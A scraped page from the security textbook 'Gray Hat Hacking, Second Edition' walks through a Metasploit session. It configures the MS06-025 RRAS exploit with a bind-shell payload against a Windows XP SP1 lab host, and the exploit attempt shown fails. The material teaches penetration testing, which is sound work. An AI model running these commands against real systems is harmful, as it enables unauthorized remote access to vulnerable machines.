Gray Hat Hacking, Second Edition

Prev | Current Page 200 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

This XP SP1 machine is not running a firewall, sowe??™ll choose a simple bind shell and
will accept the default options.
msf exploit(ms06_025_rras) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_025_rras) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.220 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Payload options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
Chapter 4: Using Metasploit
79
PART II
The exploit and payload are both set. Next we need to set a target type. Metasploit has
some generic exploits that work on all platforms, but for others you??™ll need to specify a
target operating system.
msf exploit(ms06_025_rras) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP4
1 Windows XP SP1
msf exploit(ms06_025_rras) > set TARGET 1
TARGET => 1
All set! Let??™s kick off the exploit.
msf exploit(ms06_025_rras) > exploit
[*] Started bind handler
[-] Exploit failed: Login Failed: The SMB server did not reply to our request
Hmm??¦Windows XP SP1 should not require authentication for this exploit.

Pages:
188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212

The Art of Agile Development (page 12) Absalom's Hair (page 187) Absolute Surrender and Other Addresses (page 5)

Beta Book

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"